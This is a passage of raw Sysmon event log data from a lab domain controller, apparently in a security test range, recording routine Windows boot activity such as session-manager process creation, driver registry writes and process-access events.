13:53:02.649{10ACEC4A-853E-5FCF-0400-000000009101}636640C:\Windows\System32\smss.exe{10ACEC4A-853E-5FCF-0700-000000009101}716C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000766Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.651{10ACEC4A-853E-5FCF-0700-000000009101}716C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{10ACEC4A-853E-5FCF-0400-000000009101}636C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d4 0000007c 10341000x8000000000000000765Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.649{10ACEC4A-853E-5FCF-0600-000000009101}708712C:\Windows\System32\smss.exe{10ACEC4A-853E-5FCF-0800-000000009101}724C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.654{10ACEC4A-853E-5FCF-0800-000000009101}724C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{10ACEC4A-853E-5FCF-0600-000000009101}708C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c 10341000x8000000000000000763Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.649{10ACEC4A-853D-5FCF-0200-000000009101}448456C:\Windows\System32\smss.exe{10ACEC4A-853E-5FCF-0600-000000009101}708C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000762Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.633{10ACEC4A-853D-5FCF-0200-000000009101}448456C:\Windows\System32\smss.exe{10ACEC4A-853E-5FCF-0600-000000009101}708C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000761Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.649{10ACEC4A-853E-5FCF-0600-000000009101}708C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c C:\Windows\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{10ACEC4A-853D-5FCF-0200-000000009101}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x8000000000000000760Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.633{10ACEC4A-853D-5FCF-0200-000000009101}448456C:\Windows\System32\smss.exe{10ACEC4A-853E-5FCF-0500-000000009101}644C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000759Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:02.571{10ACEC4A-853E-5FCF-0500-000000009101}644C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\VolatileSettings\{5b45201d-f2f2-4f3b-85bb-30ff1f953599}Binary Data 13241300x8000000000000000758Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:02.571{10ACEC4A-853E-5FCF-0500-000000009101}644C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\Video\ServiceBasicDisplay 13241300x8000000000000000757Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:02.571{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000756Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:02.571{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\CountDWORD (0x00000001) 13241300x8000000000000000755Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:02.571{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\0DISPLAY\Default_Monitor\4&69f2b1a&0&UID0 10341000x8000000000000000754Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.493{10ACEC4A-853E-5FCF-0400-000000009101}636640C:\Windows\System32\smss.exe{10ACEC4A-853E-5FCF-0500-000000009101}644C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000753Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.493{10ACEC4A-853E-5FCF-0500-000000009101}644C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{10ACEC4A-853E-5FCF-0400-000000009101}636C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d4 0000007c 10341000x8000000000000000752Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.368{10ACEC4A-853D-5FCF-0200-000000009101}448632C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}636C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.368{10ACEC4A-853D-5FCF-0200-000000009101}448632C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}636C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000750Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:02.371{10ACEC4A-853E-5FCF-0400-000000009101}636C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000d4 0000007c C:\Windows\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{10ACEC4A-853D-5FCF-0200-000000009101}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x8000000000000000749Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.712{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Leave)Binary Data 10341000x8000000000000000748Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:01.696{10ACEC4A-853D-5FCF-0200-000000009101}448452C:\Windows\System32\smss.exe{10ACEC4A-853D-5FCF-0300-000000009101}588C:\Windows\system32\autochk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+4f84|\SystemRoot\System32\smss.exe+20b6|\SystemRoot\System32\smss.exe+65b2|\SystemRoot\System32\smss.exe+a3bb|\SystemRoot\System32\smss.exe+1652|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000747Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:01.692{10ACEC4A-853D-5FCF-0300-000000009101}588C:\Windows\System32\autochk.exe10.0.14393.4046 (rs1_release.201028-1803)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=4DEB2ED5AD84897181481B7567B3A90D,SHA256=85C6FF209D7BD3EF690F0AC7EEF0FE0CB66D26090887E9ADB1E63C8EEF5E2C7B,IMPHASH=5F30E54B15CF4B4A5C756AEF16C9668F{10ACEC4A-853D-5FCF-0200-000000009101}448C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x8000000000000000746Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.680{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000745Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.680{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000744Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.680{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000743Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.680{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000742Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.680{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000741Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.680{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000740Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.680{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000739Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.680{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000738Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.680{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\VolumesSafeForWrite (Enter)Binary Data 13241300x8000000000000000737Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.680{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\XEN\Unplug\NICSDWORD (0x00000001) 13241300x8000000000000000736Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2020-12-08 13:53:01.665{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Enum\XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0\FriendlyNameAWS PV Network Device #0 13241300x8000000000000000735Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.665{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMinorVersionDWORD (0x00000002) 13241300x8000000000000000734Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.665{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xennet\DriverMajorVersionDWORD (0x00000008) 13241300x8000000000000000733Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.665{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMinorVersionDWORD (0x00000001) 13241300x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.665{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000731Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.665{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000730Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.665{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\CountDWORD (0x00000001) 13241300x8000000000000000729Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.665{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\0XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0 13241300x8000000000000000728Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.649{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\xenvif\Addresses\002:b5:5e:e1:e2:84 13241300x8000000000000000727Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.633{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000726Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.633{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000725Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.633{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000724Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.633{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000723Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.540{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Parameters\WppRecorder_TraceGuid{09281f1f-f66e-485a-99a2-91638f782c49} 13241300x8000000000000000722Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.540{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\i8042prt\Parameters\WppRecorder_TraceGuid{7ffb8eb8-2c86-45d6-a7c5-c023d9c070c1} 13241300x8000000000000000721Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.477{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000720Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.477{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000719Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.477{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000718Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.446{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000717Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.446{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMajorVersionDWORD (0x00000001) 13241300x8000000000000000716Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.446{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000715Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.446{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000714Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.430{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000713Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.430{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000712Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.430{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMinorVersionDWORD (0x00000028) 13241300x8000000000000000711Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.430{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000710Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.321{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\cdrom\Parameters\WppRecorder_TraceGuid{a4196372-c3c4-42d5-87bf-7edb2e9bcc27} 13241300x8000000000000000709Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.165{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000708Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.165{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\CountDWORD (0x00000001) 13241300x8000000000000000707Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.165{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 13241300x8000000000000000706Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.165{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000705Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.165{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\CountDWORD (0x00000001) 13241300x8000000000000000704Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:01.165{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 434400x8000000000000000703Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local2020-12-08 13:53:21.350Started12.034.40 10341000x80000000000000002078Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.852{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8552-5FCF-4F00-000000009101}3916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002077Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.852{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8552-5FCF-4F00-000000009101}3916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002076Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.836{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.